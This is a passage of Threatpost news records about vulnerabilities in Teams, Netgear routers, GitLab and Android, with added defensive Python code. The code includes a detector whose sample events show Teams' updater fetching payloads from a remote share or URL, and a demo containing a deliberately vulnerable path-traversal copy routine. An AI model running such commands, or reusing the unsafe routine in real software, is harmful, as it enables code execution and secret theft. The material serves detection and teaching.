_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T18:28:23", "type": "threatpost", "title": "Connected Home Hubs Open Houses to Full Remote Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-22T18:28:23", "id": "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4", "href": "https://threatpost.com/connected-home-hubs-full-remote-takeover/155037/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:43", "description": "Mozilla is bumping up its bug bounty payouts and has added new websites and services \u2013 including the recently deployed [Firefox Monitor](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) \u2013 to its bug bounty program in hopes of attracting more researchers to sniff out vulnerabilities.\n\nThe browser-maker is doubling bug bounty payouts for most of its in-scope sites and services, as well as tripling payouts for the highest bug classification in its program, remote code execution vulnerabilities. Researchers can now [bring in $15,000](<https://www.mozilla.org/en-US/security/web-bug-bounty/>) for RCE flaws on \u201ccritical websites\u201d (sites and services considered critical to Mozilla operations, which pay out at the highest bounty rate) and $5,000 for \u201ccore websites\u201d (which pay out bounties, but at a reduced rate).\n\n\u201cMozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been,\u201d said Simon Bennetts with Mozilla [in a Tuesday announcement](<https://blog.mozilla.org/security/2019/11/19/updates-to-the-mozilla-web-security-bounty-program/>). 
\u201cTo celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.\u201d\n\nIn addition, Mozilla announced that over the past six months, it has added new in-scope \u201ccritical websites\u201d and services for its program. These include:\n\n * [Autograph](<https://github.com/mozilla-services/autograph>) \u2013 a cryptographic signature service that signs Mozilla products.\n * [Lando](<https://moz-conduit.readthedocs.io/en/latest/lando-user.html>) \u2013 Mozilla\u2019s automatic code-landing service which allows users to commit Phabricator revisions to their destination repository.\n * [Phabricator](<https://wiki.mozilla.org/Phabricator>) \u2013 a code management tool used for reviewing Firefox code changes.\n * [Taskcluster](<https://docs.taskcluster.net/docs>) \u2013 the task execution framework that supports Mozilla\u2019s continuous integration and release processes.\n\nMozilla has also offered new Core sites to its program \u2013 including Firefox Monitor, a site where users can register their email address so that they can be informed if their account details are part of a data breach. 
Firefox Monitor, which made waves after it was announced in 2018 on the heels of Mozilla\u2019s partnership with Cloudflare and Have I Been Pwned (HIBP), went into [testing earlier this year](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) and has since been released.\n\nOther added \u201ccore\u201d websites that are now in-scope include:\n\n * [Localization](<https://mozilla-l10n.github.io/localizer-documentation/>) \u2013 a service contributors can use to help localize Mozilla products.\n * [Payment Subscription](<https://github.com/mozilla/subhub>) \u2013 a service that is used as the interface in front of the payment provider (Stripe).\n * [Firefox Private Network](<https://private-network.firefox.com/>) \u2013 a site from which users can download a desktop extension that helps secure and protect connections everywhere Firefox is used.\n * [Ship It](<https://wiki.mozilla.org/ReleaseEngineering/Applications/Ship_It>) \u2013 a system that accepts requests for releases from humans and translates them into information and requests that Mozilla\u2019s Buildbot-based release automation can process.\n * [Speak To Me](<https://github.com/mozilla/speech-proxy>) \u2013 Mozilla\u2019s Speech Recognition API.\n\nMozilla has continually increased rewards for bug bounty vulnerabilities over the years \u2013 the last time [being in 2015](<https://threatpost.com/mozilla-bug-bounty-payouts-going-up/113264/>). Mozilla started its [web bounty program](<https://threatpost.com/behind-numbers-mozillas-bug-bounty-program-092811/75701/>) in December 2010 and offered rewards of up to $3,000 for certain kinds of vulnerabilities reported in those sites.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? 
Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-20T21:04:32", "type": "threatpost", "title": "Mozilla Bug Bounty Program Doubles Payouts, Adds Firefox Monitor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-11-20T21:04:32", "id": "THREATPOST:BED35CFCFED307909DB60602551982A6", "href": "https://threatpost.com/mozilla-bug-bounty-program-doubles-payouts-adds-firefox-monitor/150489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:44", "description": "COVID-19 has [spurred the use of videoconferencing](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) for businesses worldwide \u2013 and this expanded threat surface has lured attackers like moths to a flame. 
Adding insult to injury, researchers have recently discovered a workaround for a previous Microsoft Teams patch that would allow a malicious actor to use the service\u2019s updater function to download any binary or malicious payload.\n\nEssentially, bad actors could hide in Microsoft Teams updater traffic, which has lately been voluminous.\n\n\u201cDue to the noisy nature of the [updater] traffic, there is a possibility that malicious traffic hiding there will evade the analyst\u2019s view or even be added to a list of allowed, and therefore unmonitored, list of applications,\u201d explained Reegun Jayapaul, researcher at Trustwave SpiderLabs, in [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>) released on Wednesday.\n\nWhile Microsoft tried to cut off this vector as a conduit for remote code execution by restricting the ability to update Teams via a URL, it was not a complete fix, the researcher explained.\n\n\u201cThe updater allows local connections via a share or local folder for product updates,\u201d Jayapaul said. \u201cInitially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to an\u2026SMB share.\u201d\n\nServer Message Block (SMB) is a network file-sharing protocol. To exploit this, an attacker would need to drop a malicious file into an open shared folder \u2013 something that typically involves already having network access. 
However, to reduce this gating factor, an attacker can create a remote rather than local share.\n\n\u201cThis would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step,\u201d Jayapaul said.\n\nTrustwave has published a proof-of-concept attack that uses Microsoft Teams Updater to download a payload \u2013 using known, common software [called Samba](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>) to carry out remote downloading.\n\nFirst, the researcher configured a Samba server for remote, public access. Then, a payload that supports the updater framework must be crafted and uploaded to a remote Samba server that has been authenticated from the Windows \u201cRun\u201d function.\n\n\u201cAfter a successful setup, I initiated the command execution, downloaded remote payload and executed directly from Microsoft Teams Updater, \u2018Update.exe,'\u201d the researcher explained.\n\n\u201cSince the installation is in the local user Appdata folder, no privileged access is needed,\u201d he added. \u201cAttackers can use this to masquerade the traffic (especially for lateral movement).\u201d\n\nMicrosoft won\u2019t be fixing the problem because \u201cwe determined that this behavior is considered to be by design as we cannot restrict SMB source for \u2013update because we have customers that apparently rely on this (e.g. folder redirection),\u201d the company told Trustwave.\n\nTo avoid or mitigate an attack, users can implement solutions that look for suspicious connections both inbound and outbound; and IT can install Microsoft Teams under the \u201cProgram Files\u201d folder, so an attacker cannot drop and execute the remote payload, according to the researcher. 
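As an added detection example (not part of Trustwave's write-up or tooling), the following Python logic applies the points above to constructed process-creation records in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage): it flags Teams' Update.exe when its --update switch is pointed at an SMB share or a URL, when the updater is spawned by a shell or script host rather than by Teams itself, and when Teams is installed per-user under AppData instead of Program Files. The event records, user names, paths and addresses are constructed for the example; the --update switch is the one the article cites.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# Constructed process-creation records (Sysmon Event ID 1 field names).
# Sample input for this example, not captured telemetry.
SAMPLE_EVENTS = [
    {   # Benign: Teams starting itself through its Squirrel-style updater.
        "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # The bypass described in the article: --update pointed at a remote SMB share.
        "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update=\\203.0.113.7\share',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # URL source: the vector Microsoft restricted, still worth surfacing.
        "Image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe",
        "CommandLine": r"Update.exe --update https://203.0.113.7/payload",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # Machine-wide install under Program Files, update source inside the install directory.
        "Image": r"C:\Program Files\Microsoft\Teams\Update.exe",
        "CommandLine": r'"C:\Program Files\Microsoft\Teams\Update.exe" --update="C:\Program Files\Microsoft\Teams\packages"',
        "ParentImage": r"C:\Program Files\Microsoft\Teams\current\Teams.exe",
    },
]

# --update=VALUE, --update VALUE, with or without double quotes around VALUE.
UPDATE_ARG = re.compile(r'--update(?:=|\s+)(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def is_teams_updater(image: str) -> bool:
    """True for an Update.exe that lives inside a Teams install directory."""
    low = image.lower()
    return ntpath.basename(low) == "update.exe" and "\\microsoft\\teams\\" in low


def classify_source(arg: str) -> str:
    """Where does the --update argument tell the updater to fetch from?"""
    if arg.startswith("\\\\"):            # UNC path: \\host\share\...
        return "smb"
    if re.match(r"https?://", arg, re.IGNORECASE):
        return "url"
    return "local"


def analyze(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per suspicious trait seen in Teams updater launches."""
    findings: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        image = ev.get("Image", "")
        if not is_teams_updater(image):
            continue
        cmd = ev.get("CommandLine", "")
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()

        m = UPDATE_ARG.search(cmd)
        if m:
            src = m.group(1) if m.group(1) is not None else m.group(2)
            kind = classify_source(src)
            if kind in ("smb", "url"):
                findings.append({"event": idx, "severity": "high",
                                 "reason": f"Teams Update.exe pulling an update from {kind}: {src}"})
            elif not src.lower().startswith(ntpath.dirname(image).lower()):
                findings.append({"event": idx, "severity": "medium",
                                 "reason": f"Teams --update source outside the install directory: {src}"})

        # Teams updates itself; a shell or script host launching the updater is not normal.
        if parent in SCRIPT_HOSTS:
            findings.append({"event": idx, "severity": "medium",
                             "reason": f"Teams Update.exe spawned by {parent}"})

        # Per-user installs sit in a user-writable directory. The researcher's mitigation is
        # to install under Program Files so an attacker cannot drop and run a payload there.
        if "\\appdata\\" in image.lower():
            findings.append({"event": idx, "severity": "info",
                             "reason": "Teams installed per-user under AppData (user-writable)"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] event {f['event']}: {f['reason']}")
```

The UNC and URL cases are treated as high because neither is a source Teams should be updating from on a managed machine; the parent-process rule catches the "living off the land" use of Update.exe even when the argument is obfuscated in a way the regex misses.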
\u201cThis can be carried out by Group policy,\u201d Jayapaul said.\n\nCompanies can also disable the built-in update mechanism and set a policy that updates are pushed only by the IT team, he added.\n
\n", "cvss3": {}, "published": "2020-08-05T15:47:04", "type": "threatpost", "title": "Microsoft Teams Patch Bypass Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-05T15:47:04", "id": "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "href": "https://threatpost.com/microsoft-teams-patch-bypass-rce/158043/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:09", "description": "Researchers have discovered a new Android vulnerability that could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages, and basically take over various functions as if they are the device\u2019s owner.\n\nSecurity researchers John H\u00f8egh-Omdal, Caner Kaya and Markus Ottensmann at Norwegian app-security provider [Promon](<https://promon.co/>) discovered the flaw\u2014which they dubbed \u201cStrandHogg\u201d from old Norse for the Viking tactic of plundering villages and holding people for ransom. They said attackers can use the vulnerability to allow \u201creal-life malware to pose as legitimate apps, with users unaware they are being targeted,\u201d according to a [blog post](<https://promon.co/security-news/strandhogg/>).\n\n\u201cThe attack can be designed to request permissions which would be natural for different targeted apps to request, in turn lowering suspicion from victims,\u201d researchers wrote. \u201cUsers are unaware that they are giving permission to the hacker and not the authentic app they believe they are using.\u201d\n\nIf the flaw is exploited, to users it appears that they are clicking on an app that they use every day, such as Facebook or Instagram. 
However, when they tap the icon, the malware starts in place of the app they intended to open, collects whatever permissions the user grants and then hands the user off to the legitimate app, so nothing looks amiss, researchers said.\n\nThe flaw, which can be exploited by \u201creal-life malware,\u201d affects all Android devices, including those running Android 10, they said, and puts the top 500 most popular apps at risk.\n\nResearchers from Promon partner Lookout already have identified 36 malicious apps exploiting the vulnerability, which can be done without gaining root access to the device, according to the post. Among those apps were variants of the BankBot Trojan, widespread malware observed all over the world as early as 2017, researchers said.\n\nMoreover, the persistent problem of malware slipping under the radar on Google Play is what appears to be responsible for the spread of malicious code that exploits the flaw, researchers said. While the specific malware sample that Promon researchers analyzed did not reside on the app store, it was installed through several dropper apps/hostile downloaders distributed on Google Play, they said.\n\nWhile these apps have since been removed, dropper apps continue to be published in spite of protections that exist on the store, researchers said. In fact, some are being downloaded millions of times before being spotted and deleted, they said.\n\nIndeed, Google has [struggled mightily](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>) with malware [making its way onto Google Play](<https://threatpost.com/google-play-malicious-apps-racked-up-335m-installs-in-september/148810/>) under its watch and recently has taken [new steps](<https://threatpost.com/google-bad-android-apps/149981/>) to try to alleviate this problem. 
The discovery of StrandHogg makes the need for better security in Android mobile apps all the more urgent.\n\nIndeed, that the vulnerability is already being exploited in the wild is troubling, as it means some users have likely been compromised already and remain at critical risk, observed Sam Bakken, senior product marketing manager at digital identity and anti-fraud solution provider [OneSpan](<https://www.onespan.com/>).\n\n\u201cAs you might imagine, criminals salivate over the monetization potential in stolen mobile banking credentials and access to one-time-passwords sent via SMS,\u201d he said in an e-mail to Threatpost. \u201cPromon\u2019s recent findings make the vulnerability as severe as it\u2019s ever been.\u201d\n\nThere is some good news in all of this, Bakken said. Security solutions do exist \u201cunder the umbrella of in-app protection\u201d that can protect devices from malware exploiting StrandHogg, including \u201capp shielding and runtime protection [that] make it easier for app developers to mitigate these windows of exposure resulting from security issues in both Android and iOS,\u201d he said.\n
\n", "cvss3": {}, "published": "2019-12-03T13:26:14", "type": "threatpost", "title": "\u2018StrandHogg\u2019 Vulnerability Allows Malware to Pose as Legitimate Android Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-12-03T13:26:14", "id": "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "href": "https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:23:48", "description": "UPDATED\n\nResearchers this week said they discovered an unpatched, zero-day vulnerability in firmware for [Netgear](<https://www.netgear.com/>) routers that puts [79 device models](<https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/>) at risk of full takeover.\n\nNetgear has since issued several hot fixes, [available here](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\nThe flaw, a memory-safety issue in the firmware\u2019s httpd web server, allows attackers to bypass authentication on affected Netgear routers, according to two separate reports: [One on the Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI) by a researcher called \u201cd4rkn3ss\u201d from the Vietnam Posts and Telecommunications Group; and a separate [blog post](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>) by Adam Nichols of cybersecurity firm [Grimm](<https://blog.grimm-co.com/>).\n\n\u201cThe specific flaw exists within the httpd service, which listens on TCP Port 80 by default,\u201d according to the ZDI report, which covers the bug\u2019s presence in the R6700 series Netgear routers. 
\u201cThe issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer.\u201d\n\nAuthentication is not required to exploit the vulnerability, which attackers can use to gain root privileges, according to the report.\n\nZDI said it informed Netgear of the vulnerability in January. The vendor had asked for an extension until the end of June for public disclosure, which ZDI declined.\n\nFor his part, Nichols discovered the flaw initially in the Netgear R7000 router series, but eventually identified 79 different Netgear devices and 758 firmware images that included a vulnerable copy of the web server.\n\n\u201cThis vulnerability affects firmwares as early as 2007 (WGT624v4, version 2.0.6),\u201d he said in his post. \u201cGiven the large number of firmware images, manually finding the appropriate gadgets is infeasible. Rather, this is a good opportunity to automate gadget detection.\u201d\n\nNichols said the overflow is readily exploitable because most of the affected firmware is built without [stack cookies](<https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries>), or stack canaries\u2014a reference to the \u201ccanary in a coal mine\u201d\u2014which are used to detect a stack buffer overflow before the corrupted return address can be used to execute malicious code, he explained. While some Netgear firmware does use this feature \u2013 namely, the D8500 firmware version 1.0.3.29 and the R6300v2 firmware versions 1.0.4.12-1.0.4.20 \u2013 most does not, he said.\n\n\u201cLater versions of the D8500 and R6300v2 stopped using stack cookies, making this vulnerability once again exploitable,\u201d Nichols explained in the post. 
\u201cThis is just one more example of how SOHO device security has fallen behind as compared to other modern software.\u201d\n\nWeb servers in the firmware of SOHO devices in general are often the most vulnerable aspect of the system as they \u201cmust parse user input from the network and run complex CGI functions that use that input,\u201d he said.\n\n\u201cFurthermore, the web server is written in C and has had very little testing, and thus it is often vulnerable to trivial memory-corruption bugs,\u201d Nichols said.\n\n## **Exploitation**\n\nThe zero-day vulnerability can be exploited in two ways, Nichols explained in his post. One is a direct attack on the web server\u2019s HTTP parser: data read with recv is copied into a fixed-size stack buffer, and a crafted request leads, through a series of steps, to a stack-buffer overflow.\n\nAttackers also can use a cross-site request forgery (CSRF) attack to exploit the vulnerability, though the attacker needs to know the model and firmware version of the target router to pull this off successfully, he explained.\n\n\u201cIf a user with a vulnerable router browses to a malicious website, that website could exploit the user\u2019s router \u2026 by serving an HTML page which sends an AJAX request containing the exploit to the target device:\u201d Nichols said. \u201cHowever, as the CSRF web page cannot read any responses from the target server, it is not possible to remotely fingerprint the device.\u201d\n\nOne mitigation for the vulnerability is to restrict interaction with the service to trusted machines, according to the ZDI report.\n\n\u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it,\u201d according to the report. 
\u201cThis could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nIn March, [Netgear patched](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. It also addressed two high-severity bugs impacting Nighthawk routers, 21 medium-severity flaws and one rated low.\n\n_**This story was updated June 25, 2020 at 11:30 a.m. ET to include information on Netgear\u2019s hot fixes.**_\n
\n", "cvss3": {}, "published": "2020-06-19T13:05:37", "type": "threatpost", "title": "Netgear Zero-Day Allows Full Takeover of Dozens of Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-06-19T13:05:37", "id": "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "href": "https://threatpost.com/netgear-zero-day-takeover-routers/156744/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:55", "description": "A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.\n\nThe flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.\n\nAt issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw in which an attacker supplies path segments such as \u201c../\u201d in a file name so that the application reads (or, depending on the operation, copies or writes) files outside the directory it meant to expose. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.\n\nSpecifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.\n\n\u201cAs there is no restriction on what file can be, path traversal can be used to copy any file,\u201d said Bowling in his bug-bounty report. 
\u201cThe file or path should be validated before copying files.\u201d\n\nBowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary file read is achieved, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml file.\n\nThe secret_key_base is the Rails master secret from which the keys used to sign and encrypt cookies are derived. Once attackers hold the secret_key_base, they can mint signed or encrypted cookies that the application accepts as its own, and Bowling used such a forged cookie to get the server to execute code.\n\nGitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.\n\nGitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.\n
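As an added illustration of the bug class described above (this is not GitLab's code, which is Ruby on Rails, nor Bowling's proof of concept), the following Python stand-in puts a copy routine that trusts an upload name verbatim beside one that resolves the path and refuses anything that escapes the upload root. The directory layout, file names and the secrets.yml contents are constructed for the example; the real target path the article names is only referenced in a comment.

```python
import os
import shutil
import tempfile


def safe_join(root: str, untrusted_name: str) -> str:
    """Join untrusted_name under root and prove the result stays inside root.

    realpath() resolves '..' and symlinks on both sides; commonpath() is used
    instead of a string prefix check so that a sibling directory such as
    'uploads-old' next to 'uploads' cannot pass as being inside 'uploads'.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, untrusted_name))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError(f"path escapes upload root: {untrusted_name!r}")
    return candidate


def copy_upload_vulnerable(uploads_root: str, name: str, dest_dir: str) -> str:
    """The bug class: the caller-supplied name is joined and copied as-is."""
    src = os.path.join(uploads_root, name)          # '../config/secrets.yml' walks out
    dst = os.path.join(dest_dir, os.path.basename(name))
    shutil.copy(src, dst)
    return dst


def copy_upload_hardened(uploads_root: str, name: str, dest_dir: str) -> str:
    """Same operation with the path validated before anything is copied."""
    src = safe_join(uploads_root, name)
    dst = os.path.join(dest_dir, os.path.basename(src))
    shutil.copy(src, dst)
    return dst


def demo() -> dict:
    """Build a throwaway tree and run both routines against it."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "uploads")
        uploads_old = os.path.join(tmp, "uploads-old")   # prefix-sibling trap
        config = os.path.join(tmp, "config")              # stands in for gitlab-rails/config
        dest = os.path.join(tmp, "moved-issue")
        for d in (uploads, uploads_old, config, dest):
            os.makedirs(d)
        with open(os.path.join(uploads, "screenshot.png"), "wb") as f:
            f.write(b"\x89PNG constructed placeholder")
        with open(os.path.join(uploads_old, "notes.txt"), "w") as f:
            f.write("old upload\n")
        with open(os.path.join(config, "secrets.yml"), "w") as f:
            # Constructed value; a real GitLab instance keeps this in
            # /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml.
            f.write("production:\n  secret_key_base: CONSTRUCTED_NOT_A_REAL_SECRET\n")

        traversal = "../config/secrets.yml"
        leaked = copy_upload_vulnerable(uploads, traversal, dest)
        with open(leaked) as f:
            leaked_secret = "secret_key_base" in f.read()

        def blocked(name: str) -> bool:
            try:
                copy_upload_hardened(uploads, name, dest)
            except ValueError:
                return True
            return False

        legit = copy_upload_hardened(uploads, "screenshot.png", dest)
        return {
            "vulnerable_leaked_secret": leaked_secret,
            "hardened_blocked_traversal": blocked(traversal),
            "hardened_blocked_prefix_sibling": blocked("../uploads-old/notes.txt"),
            "hardened_blocked_absolute": blocked(os.path.join(config, "secrets.yml")),
            "hardened_allows_legit": os.path.exists(legit),
        }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The absolute-path case matters because os.path.join discards everything before an absolute second argument, so a check that only looks for ".." in the name would still let "/opt/gitlab/.../secrets.yml" through.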
\n", "cvss3": {}, "published": "2020-04-29T16:39:56", "type": "threatpost", "title": "Critical GitLab Flaw Earns Bounty Hunter $20K", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-29T16:39:56", "id": "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "href": "https://threatpost.com/critical-gitlab-flaw-bounty-20k/155295/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:48", "description": "UPDATE\n\nNetgear will not patch 45 router models that are vulnerable to a high-severity remote code execution flaw, the router company revealed last week. However, the company says that the routers that won\u2019t receive updates are outdated or have reached EOL (End of Life).\n\nThe [remote code execution vulnerability](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) in question, [which was disclosed June 15](<https://threatpost.com/netgear-zero-day-takeover-routers/156744/>), allows network-adjacent attackers to bypass authentication on vulnerable Netgear routers and execute code as root. The high-severity flaw affects 79 Netgear Wi-Fi routers and home gateway models \u2013 but Netgear says that 45 of those router models are outside of its \u201csecurity support period.\u201d\n\n\u201cNetgear has provided firmware updates with fixes for all supported products previously disclosed by ZDI and Grimm,\u201d Netgear said in a [press statement](<https://www.tomsguide.com/news/netgear-routers-no-fixes>). 
\u201cThe remaining products included in the published list are outside of our support window. In this specific instance, the parameters were based on the last sale date of the product into the channel, which was set at three years or longer.\u201d\n\nA full list of the router models that won\u2019t be patched \u2013 as well as those that have fixes being rolled out \u2013 [is available on Netgear\u2019s website](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\n\u201cWhen we look at support windows, some of our products last five or six years, while others last only a few years,\u201d David Henry, senior vice president of Connected Home products at Netgear, told Threatpost. \u201cWhen we launch a product, as it gets old it goes into End of Life (EOL) and we stop building it and wind down [sales into the channel].\u201d\n\nFor instance, one such router that won\u2019t receive an update, the AC1450 series, dates back to 2009. 
Other router models, while newer, have reached EOL: The [R6200 and R6200v2](<https://kb.netgear.com/23748/R6200v2-FAQs>) wireless routers reached EOL in 2013 and 2016, respectively; while the Nighthawk [R7300DST](<https://www.amazon.com/NETGEAR-Nighthawk-Wireless-AC-Gigabit-Adapter/dp/B01HB56E5G>) wireless router reached EOL in the first half of 2017, said Henry.\n\nRegardless, Henry stressed that customers on both newer and older router models should install security updates as they are released and adopt basic hardening, including turning off features like remote access and changing the admin password (which he said Netgear enforces).\n\n\u201cI think it is really important that customers are paying attention to the updates we send out quarterly on our products,\u201d said Henry.\n\n## **The Flaw**\n\nAccording to the [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI), which first disclosed the issue, the flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this flaw to execute code in the context of root, according to ZDI.\n\n\u201cGiven the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines,\u201d according to ZDI. \u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nThe flaw was reported to Netgear on Jan. 8, 2020, and on June 15, 2020 the security advisory for the flaw was publicly released without a patch available. 
Additionally, a PoC exploit was published by the [GRIMM blog on June 15.](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>)\n\nNetgear has rolled out patches for 34 of the vulnerable models since the flaw was disclosed. That includes releasing \u201csecurity hotfixes\u201d for the models, which are fixes that are applied on top of existing, fully tested firmware.\n\n\u201cReleasing hotfixes allows Netgear to quickly update existing products and streamline the firmware verification process without going through full regression testing,\u201d according to Netgear. \u201cThese hotfixes are targeted at specific security issues and should have minimal effect on other areas of the product\u2019s code.\u201d\n\n## **Patch Timeline Backlash **\n\nSeveral security experts are criticizing Netgear for its patching policies and procedures. Brian Gorenc, senior director of vulnerability research and head of Trend Micro\u2019s Zero Day Initiative (ZDI) program, told Threatpost that the vulnerabilities disclosed represent some of the most severe bug categories available.\n\n\u201cUnfortunately, there are too many examples of vendors abandoning devices that are still in wide use \u2013 sometimes even when they are still available to purchase,\u201d Gorenc told Threatpost. \u201cMaybe we need to recommend manufacturers who support their products for longer \u2013 especially in our digitally connected lives. If we reward good communications and long-term support from vendors, maybe this abandonment problem will get better.\u201d\n\nZach Varnell, senior AppSec consultant at nVisium, said that the disclosure on this vulnerability \u201cappears to be more than generous since the researcher followed responsible disclosure practices and even gave an extension when asked for it.\u201d\n\n\u201cIt\u2019s unfortunate for anyone who owns one of those routers but that\u2019s the reality of product lifecycles,\u201d said Varnell. 
